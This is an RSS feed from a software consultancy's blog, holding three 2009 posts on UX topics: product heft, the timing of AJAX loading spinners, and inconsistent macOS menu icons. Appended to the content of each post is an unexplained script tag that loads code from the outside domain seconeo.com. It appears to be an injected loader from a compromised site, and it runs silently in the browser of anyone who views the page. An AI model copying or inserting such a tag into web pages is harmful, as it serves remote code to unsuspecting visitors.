<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>There4 Development &#187; UX</title>
	<atom:link href="http://there4development.com/category/blog/ux/feed/" rel="self" type="application/rss+xml" />
	<link>http://there4development.com</link>
	<description>Application development and consulting</description>
	<lastBuildDate>Wed, 01 Sep 2010 02:44:59 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Heft &#8211; Is there a corollary in UX?</title>
		<link>http://there4development.com/2009/11/heft-is-there-a-corollary-in-ux/</link>
		<comments>http://there4development.com/2009/11/heft-is-there-a-corollary-in-ux/#comments</comments>
		<pubDate>Tue, 24 Nov 2009 06:05:10 +0000</pubDate>
		<dc:creator>Craig Davis</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[UX]]></category>

		<guid isPermaLink="false">http://there4development.com/?p=407</guid>
		<description><![CDATA[There has been some really good discussion lately about the ways that we as consumers judge a product. I do believe that quality is fractal. The quality of a product can be felt almost immediately &#8211; we can all tell the difference in leather and vinyl, if not immediately by sight, certainly by touch. What [...]]]></description>
			<content:encoded><![CDATA[<p>There has been some really good discussion lately about the ways that we as consumers judge a product. I do believe that <a href="http://uxhero.com/ux-theory/quality-is-fractal/">quality is fractal</a>. The quality of a product can be felt almost immediately &#8211; we can all tell the difference in leather and vinyl, if not immediately by sight, certainly by touch. What elements in an user interface are like this? What can we change in a UX that gives an application a better feel?</p>
<p>I believe that one of the things that affects the way that we feel about a product is it&#8217;s heft &#8211; the apparent density of a product. Some small electronics devices have <a href="http://idsamp.wordpress.com/2009/08/17/whats-that-adding-dead-weight/">extra weight added</a> to them. We&#8217;ve all purchased something that looked great, but felt flimsy once it was in our hands. That added heft in this case is not entirely fake &#8211; without the added heft it wouldn&#8217;t sit on a table correctly, the cables running into it could hold it aloft or twist it around. But beyond that, it&#8217;s psychological.</p>
<p>So, with that in mind, what in UX is might be the corollary to heft?<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://there4development.com/2009/11/heft-is-there-a-corollary-in-ux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AJAX interaction indications and timers</title>
		<link>http://there4development.com/2009/11/ajax-interaction-indications-and-timers/</link>
		<comments>http://there4development.com/2009/11/ajax-interaction-indications-and-timers/#comments</comments>
		<pubDate>Sat, 14 Nov 2009 17:51:34 +0000</pubDate>
		<dc:creator>Craig Davis</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[UX]]></category>

		<guid isPermaLink="false">http://there4development.com/?p=411</guid>
		<description><![CDATA[I believe that AJAX interactions are still new enough that customers can have a difficult time knowing what to expect from them. I recently completed an interface where we were using jQuery to create and manage lists. In this list interface, we ran into some interesting assumptions that people were making about the way that the application worked based on the interface.
]]></description>
			<content:encoded><![CDATA[<p>I believe that AJAX interactions are still new enough that customers can have a difficult time knowing what to expect from them. I recently completed an interface where we were using jQuery to create and manage lists. In this list interface, we ran into some interesting assumptions that people were making about the way that the application worked based on the interface.</p>
<p>When the user added a new item to the list, the app displayed a spinner, and then faded in the new item from the input box to the list. On the development machines, it was moderately fast. But once it was on the production machines, the ajax was extremely fast &#8211; it returned in less than a tenth of a second. This meant that the spinner was displayed for such a short period of time that the users simply didn&#8217;t see it. It was never visible to the user.</p>
<p>Because of this, the users didn&#8217;t seem to be understanding that the item had become permanent &#8211; testing showed that they were actually looking for a &#8220;save&#8221; button after they had added their items to the app. After some discussion, it became apparent that the speed was confusing them. They believed that web applications have to process for a moment and communicate with a server. Because the process was so snappy, they believed that there was no way it could have been saved on the server, and so they were looking for a submit button to save their items. Because of the speed of the interface, they thought that the changes were only happening locally.</p>
<p><strong>The solution?</strong> We added a timer to the application so that the spinner would never show less than three tenths of a second. It was long enough that they <em>felt</em> that the new item had been saved.</p>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://there4development.com/2009/11/ajax-interaction-indications-and-timers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Inconsistent Menu Extras</title>
		<link>http://there4development.com/2009/11/inconsistent-menu-extras/</link>
		<comments>http://there4development.com/2009/11/inconsistent-menu-extras/#comments</comments>
		<pubDate>Fri, 13 Nov 2009 23:50:22 +0000</pubDate>
		<dc:creator>Craig Davis</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[UX]]></category>

		<guid isPermaLink="false">http://there4development.com/?p=403</guid>
		<description><![CDATA[I am surprised that the Google Notifiers for OSX are inconsistent with the system icons in the menu extras. Here&#8217;s a screenshot: I&#8217;m usually very impressed with the consistency that Google presents with their UI design, and this bothers me every time that I look at this. I would hate for the icon designers to [...]]]></description>
			<content:encoded><![CDATA[<p>I am surprised that the Google Notifiers for OSX are inconsistent with the system icons in the menu extras. Here&#8217;s a screenshot:</p>
<div id="attachment_404" class="wp-caption aligncenter" style="width: 325px"><img src="http://there4development.com/wp-content/uploads/2009/11/Picture-2.png" alt="Inconsistent colors in the menu extras" title="Google Notifiers on OSX" width="315" height="22" class="size-full wp-image-404" /><p class="wp-caption-text">Inconsistent colors in the menu extras</p></div>
<p>I&#8217;m usually very impressed with the consistency that Google presents with their UI design, and this bothers me every time that I look at this. I would hate for the icon designers to begin to ignore the simplicity that the monochrome icons present in the menu extras. I believe that the extras icons should only use color for an application that is in an alert state, such as a low battery.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://there4development.com/2009/11/inconsistent-menu-extras/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
